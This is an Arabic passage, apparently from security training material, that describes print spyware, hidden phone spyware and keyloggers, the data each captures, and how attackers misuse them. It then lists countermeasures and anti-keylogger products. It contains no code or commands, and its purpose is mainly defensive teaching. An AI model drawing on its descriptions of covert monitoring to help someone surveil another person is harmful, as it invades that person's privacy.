ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن ﻣن ﻣراﻗﺑﺔ اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ ﻟﻠﻣﻧظﻣﺔ اﻟﮭدف ﻋن ﺑﻌد ﺑﺎﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ .ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ ھﻲ ﺑرﻣﺟﯾﺎت
ﻟرﺻد اﺳﺗﺧدام اﻟطﺎﺑﻌﺎت ﻓﻲ اﻟﻣؤﺳﺳﺔ .ﯾوﻓر ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺎﺑﻌﺎت ﻣﻌﻠوﻣﺎت دﻗﯾﻘﺔ ﻋن أﻧﺷطﺔ اﻟطﺑﺎﻋﺔ ﻟﻠطﺎﺑﻌﺎت ﻓﻲ اﻟﻣﻛﺗب أو اﻟطﺎﺑﻌﺎت
اﻟﻣﺣﻠﯾﺔ ،ﻣﻣﺎ ﯾﺳﺎﻋد ﻓﻲ ﺗﺣﺳﯾن اﻟطﺑﺎﻋﺔ ،وﺗوﻓﯾر اﻟﺗﻛﺎﻟﯾف ،اﻟﺦ .ﻓﺈﻧﮫ ﯾﺳﺟل ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺗﻌﻠﻘﺔ ﺑﺄﻧﺷطﺔ اﻟطﺎﺑﻌﺔ وﺣﻔظ اﻟﻣﻌﻠوﻣﺎت ﻓﻲ
ﺳﺟﻼت ﻣﺷﻔرة وإرﺳﺎل ﻣﻠف اﻟﺳﺟل ﻟﻌﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﺣدد ﻋﺑر اﻹﻧﺗرﻧت .وﯾﺗﻛون اﻟﺗﻘرﯾر اﻟﺳﺟل ﺑﺎﻟﺿﺑط ﻣن ﻣﮭﻣﺔ اﻟطﺑﺎﻋﺔ ﻣﺛل
ﻋدد اﻟﺻﻔﺣﺎت اﻟﻣطﺑوﻋﺔ ،ﻋدد اﻟﻧﺳﺦ ،واﻟﻣﺣﺗوى اﻟﻣطﺑوع ،واﻟﺗﺎرﯾﺦ واﻟوﻗت اﻟذي اﺳﺗﻐرق ﻟﻠﻘﯾﺎم ﺑﺎﻟطﺑﺎﻋﺔ.
ﺑراﻣﺞ ﺗﺟﺳس اﻟطﺑﺎﻋﺔ ﺗﻘوم ﺑﺗﺳﺟﯾل ﺗﻘﺎرﯾر ﺳﺟل ﻓﻲ أﺷﻛﺎل ﻣﺧﺗﻠﻔﺔ ﻷﻏراض ﻣﺧﺗﻠﻔﺔ ﻣﺛل ﻋﻠﻰ ﺷﻛل web formatﻹرﺳﺎل اﻟﺗﻘﺎرﯾر إﻟﻰ
اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣن ﺧﻼل ﺷﺑﻛﺔ اﻹﻧﺗرﻧت أو اﻹﻧﺗرﻧت او ﻋﻠﻰ ﺷﻛل ﻣﺷﻔرة وﻣﺧﺑﺄة ﻟﻠﺗﺧزﯾن ﻋﻠﻰ اﻟﻘرص اﻟﻣﺣﻠﻲ.
ﺗﻘﺎرﯾر اﻟﺳﺟل اﻟﺗﻲ ﺗم إﻧﺷﺎؤھﺎ ﺳوف ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻓﻲ ﺗﺣﻠﯾل أﻧﺷطﺔ اﻟطﺎﺑﻌﺔ .وﯾﺑﯾن اﻟﺗﻘرﯾر ﻛﯾﻔﯾﺔ ﺗﺳﺟﯾل اﻟﻌدﯾد ﻣن اﻟوﺛﺎﺋﻖ وطﺑﺎﻋﺗﮭﺎ ﻣن
ﻗﺑل ﻛل ﻣوظف أو ﻣﺣطﺔ ﻋﻣل ،ﺑﺟﺎﻧب اﻟﻔﺗرة اﻟزﻣﻧﯾﺔ .ھذا ﯾﺳﺎﻋد ﻓﻲ رﺻد اﺳﺗﺧدام اﻟطﺎﺑﻌﺔ وﯾﺣدد أي ﻣن اﻟﻣوظﻔﯾن ﯾﺳﺗﺧدﻣوا اﻟطﺎﺑﻌﺔ .ھذا
اﻟﺑرﻧﺎﻣﺞ ﯾﺳﻣﺢ أﯾﺿﺎ ﻓﻲ اﻟﺣد ﻣن اﻟوﺻول إﻟﻰ اﻟطﺎﺑﻌﺔ .ﺗﻘﺎرﯾر اﻟﺳﺟل ھذه ﺗﺳﺎﻋد اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺗﻌﻘب اﻟﻣﻌﻠوﻣﺎت ﺣول اﻟوﺛﺎﺋﻖ ﺣﺳﺎﺳﺔ
واﻟﺳرﯾﺔ اﻟﺗﻲ ﺗم طﺑﺎﻋﺗﮭﺎ.
ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﮭﺎﺗف/اﻟﮭﺎﺗف اﻟﺧﻠوي ھو أداة ﺑرﻣﺟﯾﺎت اﻟﺗﻲ ﺗﻣﻧﺣك اﻟوﺻول اﻟﻛﺎﻣل وﻣراﻗﺑﺔ ھﺎﺗف/اﻟﮭﺎﺗف اﻟﺧﻠوي اﻟﺿﺣﯾﺔ .ﺣﯾث اﻧﮫ
ﯾﻘوم ﺑﺈﺧﻔﺎء ﻧﻔﺳﮫ ﺗﻣﺎﻣﺎ ﻋن ﻣﺳﺗﺧدم اﻟﮭﺎﺗف .ﺗﻘوم ھذه اﻟﺗطﺑﯾﻘﺎت ﺑﺗﺳﺟﯾل و logﻛل ﻧﺷﺎط ﻋﻠﻰ اﻟﮭﺎﺗف ﻣﺛل اﺳﺗﺧدام اﻻﻧﺗرﻧت واﻟرﺳﺎﺋل
اﻟﻧﺻﯾﺔ ،واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ .ﺛم ﯾﻣﻛﻧك اﻟوﺻول إﻟﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ ﻋن طرﯾﻖ اﻟﻣوﻗﻊ اﻹﻟﻛﺗروﻧﻲ ﻟﻠﺑرﻧﺎﻣﺞ اﻟرﺋﯾﺳﻲ أو ﯾﻣﻛﻧك أﯾﺿﺎ
اﻟﺣﺻول ﻋﻠﻰ ھذه اﻟﻣﻌﻠوﻣﺎت ﻣن ﺧﻼل ﺗﺗﺑﻊ اﻟرﺳﺎﺋل اﻟﻘﺻﯾرة أو اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ .ﻋﺎدة ،ﯾﺗم اﺳﺗﺧدام ھذه اﻟﺗطﺑﯾﻘﺎت ﻟرﺻد وﺗﺗﺑﻊ اﺳﺗﺧدام
اﻟﮭﺎﺗف ﻣن ﻗﺑل اﻟﻣوظﻔﯾن .وﻟﻛن اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣون ھذا اﻟﺗطﺑﯾﻘﺎت ﻟﺗﻌﻘب اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑﺎﻟﮭﺎﺗف/اﻟﮭﺎﺗف اﻟﺧﻠوي ﻟﻸﺷﺧﺎص
اﻟﻣﺳﺗﮭدﻓﯾن أو اﻟﻣﻧظﻣﺎت .اﺳﺗﺧدام ھذا اﻟﺗطﺑﯾﻘﺎت ﻻ ﯾﺗطﻠب أي اﻣﺗﯾﺎزات ﻟدﯾﮭﺎ.
اﻟﻛﯾﻠوﺟرز ھو ﺗطﺑﯾﻖ اﻟذي ﯾﻠﺗﻘط وﯾﺳﺟل ﺟﻣﯾﻊ ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺳرا ﺑﻣﺎ ﻓﻲ ذﻟك ﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ
اﻟﻛﻣﺑﯾوﺗر .ﻛﺎن اﻟﮭدف اﻟرﺋﯾﺳﻲ وراء ﺗطوﯾر ﺑرﻣﺟﯾﺎت ﻛﻠوﺟر اﻻﺳﺗﺧدام اﻹﯾﺟﺎﺑﻲ ﻣﺛل اﺳﺗﻌﺎدة اﻟﺑﯾﺎﻧﺎت اﻟﻣﻔﻘودة أو ﺣذف ،أو ﻣراﻗﺑﺔ
اﻟﻣوظﻔﯾن واﻷطﻔﺎل ،وﺗﺷﺧﯾص ﻣﺷﺎﻛل ﻧظﺎم اﻟﻛﻣﺑﯾوﺗر اﻷﺧرى .وﻣﻊ ذﻟك ،ﯾﺳﺗﺧدﻣﮭﺎ اﻟﻣﮭﺎﺟﻣون ﻷﻏراض أﺧرى ﺧﺑﯾﺛﺔ ﻣﺛل ﺳرﻗﺔ اﻟﮭوﯾﺔ
ﻣن اﻟﻣوظﻔﯾن ،وﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر ،واﻟﺣﺻول ﻋﻠﻰ ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وأرﻗﺎم اﻟﮭواﺗف واﻟﺣﺳﺎب اﻟﻣﺻرﻓﻲ ،واﻟﺣﺻول ﻋﻠﻰ دﺧول ﻏﯾر
ﻣﺻرح ﺑﮫ ،وھﻠم ﺟرا .ﻋﻠﻰ اﻟرﻏم ﻣن أﻧﮫ ﻣن اﻟﺻﻌب اﻟﻛﺷف ﻋن وﺟود ﻛﯾﻠوﺟرز ﺣﯾث أﻧﮭﺎ ﻣﺧﻔﯾﺔ ﻋﻠﻰ اﻟﻧظﺎم ،ﻓﮭﻧﺎك ﻋدد ﻗﻠﯾل ﻣن اﻟطرق
ﻟﻠدﻓﺎع ﺿد ﻛﯾﻠوﺟرز:
-ﺗﺛﺑﯾت ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت وﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس .ﺣﯾث أن اﻟﻔﯾروﺳﺎت ،واﻟﺗرواﺟن ،واﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ اﻷﺧرى ھﻲ
وﺳﺎﺋط واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﺗﻐزو ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .ﻣﻛﺎﻓﺢ اﻟﻔﯾروﺳﺎت وﻣﻛﺎﻓﺢ اﻟﺗﺟﺳس ھﻲ ﺧط اﻟدﻓﺎع اﻷول ﺿد
ﻛﯾﻠوﺟرز .اﺳﺗﺧدام ﺗطﺑﯾﻘﺎت ﻟﺗﻧظﯾف ﻛﻠوﺟر ﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ،اﻟﻛﯾﻠوﺟرز اﻟﺗﻲ ﯾﺗم اﻟﻛﺷف ﻋﻧﮫ ﻣن ﻗﺑل ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ
اﻟﻔﯾروﺳﺎت ﯾﻣﻛن ﺣذﻓﮫ ﻣن اﻟﻛﻣﺑﯾوﺗر.
-ﺗﺛﺑﯾت ،host-based IDSواﻟذي ﯾﻣﻛﻧﮫ رﺻد اﻟﻧظﺎم اﻟﺧﺎص ﺑك وﺗﻌطﯾل ﺗﺛﺑﯾت ﻛﯾﻠوﺟرز.
-ﺗﻔﻌﯾل ﺟدران اﻟﺣﻣﺎﯾﺔ )(Firewallﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .اﻟﺟدران اﻟﻧﺎرﯾﺔ ) (Firewallﺗﻣﻧﻊ اﻟوﺻول إﻟﻰ ﺧﺎرج اﻟﻛﻣﺑﯾوﺗر.
اﻟﺟدران اﻟﻧﺎرﯾﺔ ﺗﻣﻧﻊ اﻧﺗﻘﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺳﺟﻠﺔ إﻟﻰ اﻟﻣﮭﺎﺟم.
-ﺗﺗﺑﻊ اﻟﺑراﻣﺞ اﻟﺗﻲ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .اﺳﺗﺧدام اﻟﺑرﻣﺟﯾﺎت اﻟﺗﻲ ﺗﻔﺣص ﺑﺷﻛل ﻣﺗﻛرر وﺗراﻗب اﻟﺗﻐﯾرات اﻟﺗﻲ طرأت
ﻋﻠﻰ اﻟﻧظﺎم أو اﻟﺷﺑﻛﺔ .ﻛﯾﻠوﺟرز ﯾﻣﯾل ﻋﺎدة ﻟﻠﺗﺷﻐﯾل ﻓﻲ اﻟﺧﻠﻔﯾﺔ.
-اﻟﺣﻔﺎظ ﻋﻠﻰ أﻧظﻣﺔ اﻷﺟﮭزة اﻟﺧﺎﺻﺔ ﺑك آﻣﻧﺔ ﻓﻲ ﺑﯾﺋﺔ ﻣؤﻣﻧﺔ ،وﯾﻔﺿل اﻟﺗﺣﻘﻖ ﻛﺛﯾرا ﻣن ﻛﺎﺑﻼت ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻟﻣوﺻﻠﺔ ،ﻣﻧﻔذ
،USBوأﻟﻌﺎب اﻟﻛﻣﺑﯾوﺗر ﻣﺛل PS2اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧدﻣﮭﺎ ﻟﺗﺛﺑﯾت ﺑراﻣﺞ ﻛﻠوﺟر.
-اﻟﺗﻌرف ﻋﻠﻰ وﺣذف رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻻﺣﺗﯾﺎﻟﯾﺔ ) (phishing emailsﻷن ﻣﻌظم اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدﻣوا رﺳﺎﺋل اﻟﺑرﯾد
اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎدﻋﺔ ﻛوﺳﯾﻠﺔ ﻟﻧﻘل ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز ﻟﻧظﺎم اﻟﺿﺣﯾﺔ.
-ﺗﻔﻌﯾل pop-up blockersوﺗﻔﺎدى ﻓﺗﺢ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ وﻣرﻓﻘﺎﺗﮭﺎ.
-ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت وﻣﻛﺎﻓﺣﺔ اﻟﺗﺟﺳس ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋﻠﻰ أي ﺷﻲء ﯾﺗم ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ اﻟﻧظﺎم ،وﻟﻛن ﻣن اﻷﻓﺿل اﻟﻛﺷف ﻋن
ھذه اﻟﺑراﻣﺞ ﻗﺑل أن ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ .ﻓﺣص اﻟﻣﻠﻔﺎت ﺟﯾدا ﻗﺑل ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر واﺳﺗﺧدام registry editorأو process
explorerﻟﻠﺗﺣﻘﻖ ﻣن اﻟﻣﺗﻠﺻﺻﯾن.
-اﺳﺗﺧدام USBﻻﯾف ﻣﺣﻣﻲ ﺿد اﻟﻛﺗﺎﺑﺔ او CD/DVDﻻﯾف ﻹﻋﺎدة ﺗﺷﻐﯾل اﻟﻛﻣﺑﯾوﺗر.
-اﺳﺗﺧدام ﺑراﻣﺞ ﻣلء اﻟﻧﻣوذج اﻟﺗﻠﻘﺎﺋﻲ ) (automatic form-filling programsأو ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ اﻻﻓﺗراﺿﯾﺔ )(virtual keyboard
ﻹدﺧﺎل أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور ﻷﻧﮭﺎ ﺗﺟﻧب اﻟﺗﻌرض ﻣن ﺧﻼل ﻛﯾﻠوﺟرز .ﺑراﻣﺞ ﻣلء اﻟﻧﻣوذج ﺗﻠﻘﺎﺋﯾﺎ ﺳوف ﺗزﯾل
اﻟﺗﻌرض ﻻﺳﺗﺧدام ﻛﺗﺎﺑﺔ اﻟﺗﻔﺎﺻﯾل اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك واﻟﻣﺎﻟﯾﺔ ،أو اﻟﺳرﯾﺔ ﻣﺛل أرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن وﻛﻠﻣﺎت اﻟﺳر ﻣن ﺧﻼل
ﻟوﺣﺎت اﻟﻣﻔﺎﺗﯾﺢ.
-اﺳﺗﺧدام ﺑراﻣﺞ ﺗدﺧل اﻟﻣﻔﺎﺗﯾﺢ) ، (keystroke interferenceواﻟذي ﯾدرج اﻷﺣرف اﻟﻌﺷواﺋﯾﺔ ﻣﻊ ﻛل ﺿﻐطﺔ ﻣﻔﺎﺗﯾﺢ.
-اﺳﺗﺧدام أداة اﻟﻣﺳﺎﻋدة ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﻟﻠﻣﻌﺎﻗﯾن ) (Windows on-screen keyboard accessibilityﻹدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور أو
أي ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ أﺧرى .ﯾﻣﻛﻧك اﻟﺣﻔﺎظ ﻋﻠﻰ ﺳرﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك ﻷﻧﮫ ھﻧﺎ ﯾﺗم اﺳﺗﺧدام اﻟﻣﺎوس ﻹدﺧﺎل أي ﻣﻌﻠوﻣﺎت ﻣﺛل
ﻛﻠﻣﺎت اﻟﺳر ،وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن ،اﻟﺦ ﻓﻲ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺑدﻻ ﻣن ﻛﺗﺎﺑﺔ ﻛﻠﻣﺎت اﻟﺳر ﺑﺎﺳﺗﺧدام ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ.
-ا ﺗﻧﻘر ﻋﻠﻰ وﺻﻼت ﻓﻲ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻏﯾر اﻟﻣرﻏوب ﻓﯾﮭﺎ أو اﻟﻣﺷﺑوھﺔ اﻟﺗﻲ ﻗد ﺗﺷﯾر ﻟك اﻟﻣواﻗﻊ اﻟﺧﺑﯾﺛﺔ.
اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة اﻟﻣذﻛورة ﺣﺗﻰ اﻵن ﺗﺳﺗﺧدم ﻟﺗوﻓﯾر اﻟﺣﻣﺎﯾﺔ ﺿد ﺑرﻣﺟﯾﺎت اﻟﻛﯾﻠوﺟرز .أﻣﺎ اﻵن ﺳوف ﻧﻧﺎﻗش اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﻟﻠﺣﻣﺎﯾﺔ ﺿد
أﺟﮭزة اﻟﻛﯾﻠوﺟرز .أﺟﮭزة اﻟﻛﯾﻠوﺟرز ھو اﻟﺟﮭﺎز اﻟذي ﯾﺳﺟل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻋﻠﻰ ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ .ﯾﺗم
ﺗوﺻﯾل ھذا اﻟﺟﮭﺎز ﻓﻲ اﻟﻣﻛﺎن ﻣﺎ ﺑﯾن ﺣﺎﻟﺔ اﻟﻛﻣﺑﯾوﺗر وﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ .ﯾﺗم اﺳﺗﺧدام ﻛﻠوﻏر ﻛﺗطﺑﯾﻘﺎت اﻟﻣﺷروﻋﺔ ﻓﺿﻼ ﻋن اﻟﻣﮭﺎﺟﻣﯾن اﻟذﯾن
ﯾﺳﺗﺧدﻣوھﺎ ﻷﻏراض ﺧﺎدﻋﺔ ﻣﺛل ﺳرﻗﺔ ﻛﻠﻣﺎت اﻟﺳر وأرﻗﺎم اﻟﺣﺳﺎﺑﺎت اﻟﻣﺻرﻓﯾﺔ وأرﻗﺎم اﻟﮭﺎﺗف ،وھﻠم ﺟرا .ﻟﻠدﻓﺎع ﻋن اﻟﻧظﺎم اﻟﺧﺎص ﺑك
ﺿد ﻛﯾﻠوﺟرز ،ﻧﺗﺑﻊ اﻟﻣﺿﺎدات اﻟﻣدرﺟﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
ﻓﺣص دوري ﻟﻛل أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر واﻟﺗﺣﻘﻖ ﻣﺎ إذا ﻛﺎن ھﻧﺎك أي ﺟﮭﺎز ﻣﺗﺻل ﺑﮭم. -
Anti-Keyloggers
ﻣﻛﺎﻓﺣﺔ ﻛﯾﻠوﺟرز ) ،(Anti-Keyloggersوﺗﺳﻣﻰ أﯾﺿﺎ ،anti-keystroke loggersﺻﻣﻣت ﺧﺻﯾﺻﺎ ﻟﻛﺷف وﺗﻌطﯾل ﺑراﻣﺞ ﺗﺳﺟﯾل
ﺿرﺑﺔ اﻟﻣﻔﺗﺎح) . (keystroke loggerﺻﻣﻣت ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﺧﺻﯾﺻﺎ ﻟﻐرض اﻟﻛﺷف ﻋن ﺑرﻣﺟﯾﺎت ﻛﯾﻠوﺟرز .اﻟﻌدﯾد ﻣن اﻟﻣﻧظﻣﺎت
اﻟﻛﺑﯾرة ،واﻟﻣؤﺳﺳﺎت اﻟﻣﺎﻟﯾﺔ ،واﻟﺻﻧﺎﻋﺎت وﺷرﻛﺎت اﻷﻟﻌﺎب ﻋﺑر اﻹﻧﺗرﻧت ،ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ اﻻﻓراد ﯾﺳﺗﺧدﻣوا )(Anti-Keyloggers
ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﻟﺣﻣﺎﯾﺔ ﺧﺻوﺻﯾﺎﺗﮭم أﺛﻧﺎء اﺳﺗﺧدام اﻷﻧظﻣﺔ .ھذه اﻟﺑراﻣﺞ ﺗﻣﻧﻊ ﻛﻠوﺟر ﻣن ﺗﺳﺟﯾل ﻛل ﺿﻐطﺔ ﯾﺗم ﻛﺗﺎﺑﺗﮭﺎ ﻣن ﻗﺑل اﻟﺿﺣﯾﺔ
وﯾﺑﻘﻲ ﻋﻠﻰ ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ آﻣﻧﺔ وﻣﺄﻣوﻧﺔ اﻵن .ﻣﺿﺎد اﻟﻛﯾﻠوﺟرز ﯾﻔﺣص ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ،ﯾﻛﺗﺷف ،وﯾزﯾل ﺑراﻣﺞ ﺗﺳﺟﯾل ﺿرﺑﺔ
اﻟﻣﻔﺗﺎح .إذا ﻛﺎن اﻟﺑرﻧﺎﻣﺞ )ﻣﺿﺎدة اﻟﻛﯾﻠوﺟرز( ﯾﺟد أي ﺑرﻧﺎﻣﺞ ﯾﺳﺟل أي ﺿﻐطﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ،ﻓﺈﻧﮫ ﯾﺣدده ﻋﻠﻰ اﻟﻔور
وإزاﻟﺗﮫ ،ﺳواء ﻛﺎﻧت ﺑرﻧﺎﻣﺞ ﺗﺳﺟﯾل ﺿﻐط اﻟﻣﻔﺎﺗﯾﺢ ﻣﺷروﻋﺔ أو ﺑرﻧﺎﻣﺞ ﺗﺳﺟﯾل اﻟﺿﻐطﺔ ﻏﯾر ﺷرﻋﯾﺔ.
ﺑﻌض ﻣﺿﺎدات اﻟﻛﯾﻠوﺟرز ﺗﻛﺷف ﻋن وﺟود اﻟﻛﯾﻠوﺟرز اﻟﻣﺧﻔﻲ ﻋن طرﯾﻖ ﻣﻘﺎرﻧﺔ ﻛل اﻟﻣﻠﻔﺎت ﻓﻲ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣﻘﺎﺑل ﻗﺎﻋدة ﺑﯾﺎﻧﺎت ﺗوﻗﯾﻊ
ﻛﯾﻠوﺟرز ) (signature databaseواﻟﺑﺣث ﻋن أوﺟﮫ اﻟﺗﺷﺎﺑﮫ .ﺑﻌض اﻟﻣﺿﺎدة اﻷﺧرى ﻟﻠﻛﯾﻠوﺟرز ﺗﻛﺷف ﻋن وﺟود ﻛﯾﻠوﺟرز اﻟﻣﺧﺑﺄة ﻋن
طرﯾﻖ ﺣﻣﺎﯾﺔ ﻣﻠف ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ) (keyboard driverواﻟﻛﯾرﻧل ﻣن اﻟﺗﻼﻋب .ﻟوﺣﺔ ﻣﻔﺎﺗﯾﺢ اﻻﻓﺗراﺿﯾﺔ ) (virtual keyboardأو
touchscreenﯾﺟﻌل ﻣﮭﻣﺔ اﻟﺗﻘﺎط اﻟﻣﻔﺎﺗﯾﺢ ﻣن ﺑرﻣﺟﯾﺎت اﻟﺗﺟﺳس اﻟﺧﺑﯾﺛﺔ أو ﺑراﻣﺞ اﻟﺗروﺟﺎن ﺻﻌﺑﺔ.
اﻟﻣﺻدرhttp://www.zemana.com :
Zemana AntiLoggerھو ﺑرﻧﺎﻣﺞ أﻣﻧﻰ ﻋﺎﻟﻲ اﻷداء واﻟذى ﯾﻘوم ﺑﺣﻣﺎﯾﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎص ﺑك ﻣن ھﺟﻣﺎت ﻛﻠوﺟر واﻟﺑراﻣﺞ
اﻟﺧﺑﯾﺛﺔ ،وﺑﺎﻟﺗﺎﻟﻲ ﺣﻣﺎﯾﺔ ھوﯾﺗك AntiLogger.ﺗﻘوم ﺑﺎﻟﻛﺷف ﻋن اﻟﺑراﻣﺞ اﻟﺿﺎرة ﻓﻲ اﻟوﻗت اﻟذي ﺗﮭﺎﺟم اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺑدﻻ ﻣن اﻟﻛﺷف
ﻋﻧﮭﺎ اﻟﻣﻌﺗﻣد ﻋﻠﻰ ﺑﺻﻣﺔ اﻟﺗوﻗﯾﻊ ) .(signature fingerprintﺣﯾث إﻧﮫ ﺳوف ﯾﻘوم ﺑﺗﻧﺑﯾﮭك إذا ﺣﺎوﻟت أي ﻣن اﻟﺑرﻧﺎﻣﺞ اﻟﺧﺑﯾﺛﺔ اﻟﻘﯾﺎم
ﺑﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ،او اﻟﺗﻘﺎط ﺻوره ﻟﻠﺷﺎﺷﺔ ،او اﻟوﺻول إﻟﻰ اﻟﺣﺎﻓظﺔ اﻟﺧﺎﺻﺔ ﺑك ،واﻟﻣﯾﻛروﻓون ،او ﻛﺎﻣﯾرا
اﻟوﯾب ،أو إﻗﺣﺎم ﻧﻔﺳﮫ ﻓﻲ أي اﻟﻣﻧﺎطﻖ اﻟﺣﺳﺎﺳﺔ ﻓﻲ اﻟﻧظﺎم اﻟﺧﺎص ﺑك.
Zemana AntiLoggerﯾوﻓر اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﺗﮭدﯾدات اﻟﻣﺧﺗﻠﻔﺔ ﻣﺛل ﺗﺳﺟﯾل ،(SSL Logger) SSLوﺗﺳﺟﯾل ﻛﺎﻣﯾرا وﯾب )(webcam logger
،ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ) ، (KeyLoggerﺗﺳﺟﯾل اﻟﺣﺎﻓظﺔ ) ، (clipboard loggerﺗﺳﺟﯾل اﻟﺷﺎﺷﺔ ) ، (screen loggerواﻟﺑرﻣﺟﯾﺎت
اﻟﺗﺟﺳﺳﯾﺔ ) ،(spywareﻣﺻرﻓﻲ ،SSLواﻟﺗرواﺟن ،اﻟﺦ.
ﻣﺿﺎدات ﻛﯾﻠوﺟرز ﺗﻘوم ﺑﺗﺄﻣﯾن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﻣن ھﺟﻣﺎت ﺑراﻣﺞ اﻟﺗﺟﺳس ،ﺑرﻣﺟﯾﺎت ﻛﯾﻠوﺟرز ،وأﺟﮭزة .Keyloggersﯾﺗم ﺳرد ﺑﻌض
ﻣن ﻣﺿﺎدة اﻟﻛﯾﻠوﺟرز اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﺗﺄﻣﯾن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺿد اﻟﺗﮭدﯾدات اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ:
Anti-Keylogger available at http://www.anti-keyloggers.com
PrivacyKeyboard available at http://www.anti-keylogger.com
Defensewall HIPS available at http://www.softsphere.com
Keyscrambler available at http://www.qfxsoftware.com
I Hate Keyloggers available at http://dewasoft.com
SpyShelter STOP-LOGGER available at http://www.spyshelter.com
